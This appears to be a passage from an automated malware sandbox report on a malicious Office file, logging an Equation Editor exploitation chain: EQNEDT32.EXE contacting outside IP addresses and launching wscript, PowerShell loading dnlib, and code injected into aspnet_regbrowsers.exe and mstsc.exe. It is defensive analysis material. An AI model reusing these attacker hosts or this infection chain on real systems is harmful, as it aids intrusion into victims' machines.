      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_009135FC memset,CryptUIDlgViewCertificateW,GetLastError,27_2_009135FC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0091D561 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,27_2_0091D561
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00933F45 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,27_2_00933F45

      Exploits

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 38.240.41.28 Port: 80Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
      Source: ~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp.4.drStream path '_1789768840/\x1CompObj' : ...................F....Microsoft Equation 3.0....
      Source: ~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp.4.drStream path '_1789768844/\x1CompObj' : ...................F....Microsoft Equation 3.0....
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49164 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49166 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49167 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49171 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49161 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.511016346.0000000001EE0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.512113443.0000000002040000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637891163.0000000002350000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: aspnet_regbrowsers.pdb source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mstsc.pdb source: aspnet_regbrowsers.exe, 00000016.00000002.512368653.00000000008A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: BKsn.pdbSHA256z source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: BKsn.pdb source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
